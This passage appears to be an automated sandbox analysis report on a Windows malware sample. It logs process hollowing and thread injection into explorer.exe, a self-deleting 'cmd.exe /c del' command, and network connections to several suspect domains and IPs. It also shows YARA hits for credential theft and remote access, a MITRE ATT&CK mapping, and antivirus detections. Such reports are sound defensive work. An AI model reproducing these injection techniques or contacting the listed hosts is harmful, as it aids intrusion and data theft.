Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BB02A mov eax, dword ptr fs:[00000030h]	12_2_055BB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DBC2C mov eax, dword ptr fs:[00000030h]	12_2_055DBC2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05674015 mov eax, dword ptr fs:[00000030h]	12_2_05674015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05674015 mov eax, dword ptr fs:[00000030h]	12_2_05674015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05627016 mov eax, dword ptr fs:[00000030h]	12_2_05627016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05627016 mov eax, dword ptr fs:[00000030h]	12_2_05627016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05627016 mov eax, dword ptr fs:[00000030h]	12_2_05627016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626CF0 mov eax, dword ptr fs:[00000030h]	12_2_05626CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626CF0 mov eax, dword ptr fs:[00000030h]	12_2_05626CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05626CF0 mov eax, dword ptr fs:[00000030h]	12_2_05626CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056614FB mov eax, dword ptr fs:[00000030h]	12_2_056614FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05678CD6 mov eax, dword ptr fs:[00000030h]	12_2_05678CD6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]	12_2_0563B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563B8D0 mov ecx, dword ptr fs:[00000030h]	12_2_0563B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]	12_2_0563B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]	12_2_0563B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]	12_2_0563B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563B8D0 mov eax, dword ptr fs:[00000030h]	12_2_0563B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A58EC mov eax, dword ptr fs:[00000030h]	12_2_055A58EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B849B mov eax, dword ptr fs:[00000030h]	12_2_055B849B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9080 mov eax, dword ptr fs:[00000030h]	12_2_055A9080
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DF0BF mov ecx, dword ptr fs:[00000030h]	12_2_055DF0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DF0BF mov eax, dword ptr fs:[00000030h]	12_2_055DF0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DF0BF mov eax, dword ptr fs:[00000030h]	12_2_055DF0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05623884 mov eax, dword ptr fs:[00000030h]	12_2_05623884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05623884 mov eax, dword ptr fs:[00000030h]	12_2_05623884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E90AF mov eax, dword ptr fs:[00000030h]	12_2_055E90AF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D20A0 mov eax, dword ptr fs:[00000030h]	12_2_055D20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AF358 mov eax, dword ptr fs:[00000030h]	12_2_055AF358
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05678F6A mov eax, dword ptr fs:[00000030h]	12_2_05678F6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055ADB40 mov eax, dword ptr fs:[00000030h]	12_2_055ADB40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BEF40 mov eax, dword ptr fs:[00000030h]	12_2_055BEF40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D3B7A mov eax, dword ptr fs:[00000030h]	12_2_055D3B7A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D3B7A mov eax, dword ptr fs:[00000030h]	12_2_055D3B7A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055ADB60 mov ecx, dword ptr fs:[00000030h]	12_2_055ADB60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055BFF60 mov eax, dword ptr fs:[00000030h]	12_2_055BFF60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05678B58 mov eax, dword ptr fs:[00000030h]	12_2_05678B58
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CF716 mov eax, dword ptr fs:[00000030h]	12_2_055CF716
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DA70E mov eax, dword ptr fs:[00000030h]	12_2_055DA70E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DA70E mov eax, dword ptr fs:[00000030h]	12_2_055DA70E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0567070D mov eax, dword ptr fs:[00000030h]	12_2_0567070D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0567070D mov eax, dword ptr fs:[00000030h]	12_2_0567070D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DE730 mov eax, dword ptr fs:[00000030h]	12_2_055DE730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563FF10 mov eax, dword ptr fs:[00000030h]	12_2_0563FF10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0563FF10 mov eax, dword ptr fs:[00000030h]	12_2_0563FF10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A4F2E mov eax, dword ptr fs:[00000030h]	12_2_055A4F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A4F2E mov eax, dword ptr fs:[00000030h]	12_2_055A4F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566131B mov eax, dword ptr fs:[00000030h]	12_2_0566131B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056253CA mov eax, dword ptr fs:[00000030h]	12_2_056253CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_056253CA mov eax, dword ptr fs:[00000030h]	12_2_056253CA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E37F5 mov eax, dword ptr fs:[00000030h]	12_2_055E37F5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CDBE9 mov eax, dword ptr fs:[00000030h]	12_2_055CDBE9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]	12_2_055D03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]	12_2_055D03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]	12_2_055D03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]	12_2_055D03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]	12_2_055D03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D03E2 mov eax, dword ptr fs:[00000030h]	12_2_055D03E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05675BA5 mov eax, dword ptr fs:[00000030h]	12_2_05675BA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D2397 mov eax, dword ptr fs:[00000030h]	12_2_055D2397
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DB390 mov eax, dword ptr fs:[00000030h]	12_2_055DB390
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B8794 mov eax, dword ptr fs:[00000030h]	12_2_055B8794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B1B8F mov eax, dword ptr fs:[00000030h]	12_2_055B1B8F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B1B8F mov eax, dword ptr fs:[00000030h]	12_2_055B1B8F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0565D380 mov ecx, dword ptr fs:[00000030h]	12_2_0565D380
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566138A mov eax, dword ptr fs:[00000030h]	12_2_0566138A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D4BAD mov eax, dword ptr fs:[00000030h]	12_2_055D4BAD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D4BAD mov eax, dword ptr fs:[00000030h]	12_2_055D4BAD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055D4BAD mov eax, dword ptr fs:[00000030h]	12_2_055D4BAD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05627794 mov eax, dword ptr fs:[00000030h]	12_2_05627794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05627794 mov eax, dword ptr fs:[00000030h]	12_2_05627794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05627794 mov eax, dword ptr fs:[00000030h]	12_2_05627794
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0565B260 mov eax, dword ptr fs:[00000030h]	12_2_0565B260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0565B260 mov eax, dword ptr fs:[00000030h]	12_2_0565B260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05678A62 mov eax, dword ptr fs:[00000030h]	12_2_05678A62
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]	12_2_055A9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]	12_2_055A9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]	12_2_055A9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A9240 mov eax, dword ptr fs:[00000030h]	12_2_055A9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]	12_2_055B7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]	12_2_055B7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]	12_2_055B7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]	12_2_055B7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]	12_2_055B7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B7E41 mov eax, dword ptr fs:[00000030h]	12_2_055B7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566AE44 mov eax, dword ptr fs:[00000030h]	12_2_0566AE44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566AE44 mov eax, dword ptr fs:[00000030h]	12_2_0566AE44
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E927A mov eax, dword ptr fs:[00000030h]	12_2_055E927A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]	12_2_055CAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]	12_2_055CAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]	12_2_055CAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]	12_2_055CAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055CAE73 mov eax, dword ptr fs:[00000030h]	12_2_055CAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0566EA55 mov eax, dword ptr fs:[00000030h]	12_2_0566EA55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_05634257 mov eax, dword ptr fs:[00000030h]	12_2_05634257
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B766D mov eax, dword ptr fs:[00000030h]	12_2_055B766D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055C3A1C mov eax, dword ptr fs:[00000030h]	12_2_055C3A1C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DA61C mov eax, dword ptr fs:[00000030h]	12_2_055DA61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055DA61C mov eax, dword ptr fs:[00000030h]	12_2_055DA61C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A5210 mov eax, dword ptr fs:[00000030h]	12_2_055A5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A5210 mov ecx, dword ptr fs:[00000030h]	12_2_055A5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A5210 mov eax, dword ptr fs:[00000030h]	12_2_055A5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055A5210 mov eax, dword ptr fs:[00000030h]	12_2_055A5210
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AAA16 mov eax, dword ptr fs:[00000030h]	12_2_055AAA16
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AAA16 mov eax, dword ptr fs:[00000030h]	12_2_055AAA16
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055B8A0A mov eax, dword ptr fs:[00000030h]	12_2_055B8A0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0565FE3F mov eax, dword ptr fs:[00000030h]	12_2_0565FE3F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055AC600 mov eax, dword ptr fs:[00000030h]	12_2_055AC600

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe

Code function: 3_2_0040A150 LdrLoadDll,

3_2_0040A150

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Domain query: www.coraroseromance.net
Source: C:\Windows\explorer.exe	Domain query: www.foldemforever.com
Source: C:\Windows\explorer.exe	Domain query: www.fuugiti.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.loveuco.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.18.171 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe

Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: F50000

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Thread register set: target process: 684			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread register set: target process: 684			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process created: C:\Windows\SysWOW64\ByteCodeGenerator.exe C:\Windows\SysWOW64\ByteCodeGenerator.exe			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"			Jump to behavior

Source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.477624235.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529461313.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529001079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000004.00000000.477624235.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529461313.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.508931900.0000000001430000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: YProgram Managerf
Source: explorer.exe, 00000004.00000000.477624235.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.529461313.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.508931900.0000000001430000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	512 Process Injection	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	112 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Hidden Users	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	3 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Tedy.130342.18814.exe	28%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.ByteCodeGenerator.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
3.0.ByteCodeGenerator.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
3.0.ByteCodeGenerator.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
3.0.ByteCodeGenerator.exe.400000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
12.2.explorer.exe.f50000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
